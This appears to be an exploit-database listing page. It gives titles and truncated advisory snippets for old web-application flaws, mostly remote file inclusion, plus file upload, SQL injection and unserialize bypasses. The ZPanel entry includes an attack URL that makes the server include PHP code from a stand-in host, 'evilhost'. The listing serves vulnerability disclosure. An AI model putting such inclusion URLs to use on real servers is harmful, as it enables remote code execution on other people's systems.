IceWarp Universal WebMail /mail/include.html - Crafted HTTP_USER_AGENT Arbitrary File Access

No description provided by source. source: http://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. An attacker can explo...

OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability

No description provided by source. ??php / OpenEMR 4.1.1 ofcuploadimage.php Arbitrary File Upload Vulnerability Vendor: OpenEMR Product web page: http://www.open-emr.org Affected version: 4.1.1 Summary: OpenEMR is a Free and Open Source electronic health records and medical practice management...

ZPanel <= 2.5 - Remote SQL Injection Exploit

No description provided by source. Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel = 2.5 beta 10, remote - in ZPanel 2.0. exploit for v 2.0 http://localhost/zpanel/zpanel.php?page=http://evilhost/shell where http://evilhost/shell.php - evil php code...

Invision Power Board <= 3.3.4 unserialize Regex Bypass

No description provided by source. ?php / So this is the patch that sanitizes, static public function safeUnserialize $serialized // unserialize will return false for object declared with small cap o // as well as if there is any ws between O and : if isstring $serialized && strpos $serialized, \...

Gravity Board X 1.1 CSS Template Unauthorized Access Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/14502/info Gravity Board X GBX is affected by an unauthorized access vulnerability. This issue is due to a failure in the application to perform proper access validation before granting access to privileged functions. An...

SiteBuilder-FX Top.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/18756/info SiteBuilder-FX is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an...

Simple Machines Forum <= 1.1.4 - Multiple Remote File Include Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/28493/info Simple Machines Forum is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary...

ezContents 2.0.3 showlinks.php GLOBALS[admin_home] Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include an arbitrary remote fi...

DoubleSpeak 0.1 - Multiple Remote File Include Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/18401/info DoubleSpeak is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to inclu...

PhpLeague 0.81 consult/miniseul.php cheminmini Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/20756/info Php League is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to include an arbitrary remote file containing...

RW::Download Stats.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/18901/info RW::Download is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include arbitrary remote files containing malicious...

dotWidget for articles 2.0 admin/categories.php Multiple Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issu...

Artmedic Newsletter 4.1 Log.PHP Remote Script Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/18047/info Artmedic Newsletter is prone to a remote PHP code-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to creat...

Dotproject 2.0 /modules/projects/gantt2.php dPconfig[root_dir] Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to includ...

ezContents 2.0.3 shownews.php GLOBALS[admin_home] Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include an arbitrary remote fi...

MyWebland miniBloggie 1.0 Fname Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/19476/info miniBloggie is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious...

AzDGVote 0 Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/17447/info AzDGVote is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary...

Belchior Foundry VCard 2.9 - Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/15207/info vCard is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary remote...

MiraksGalerie 2.62 galsecurity.lib.php listconfigfile[0] Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/18313/info MiraksGalerie is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to...

Barryvan Compo Manager 0.3 - 'main.php' Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/28035/info Barryvan Compo Manager is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containin...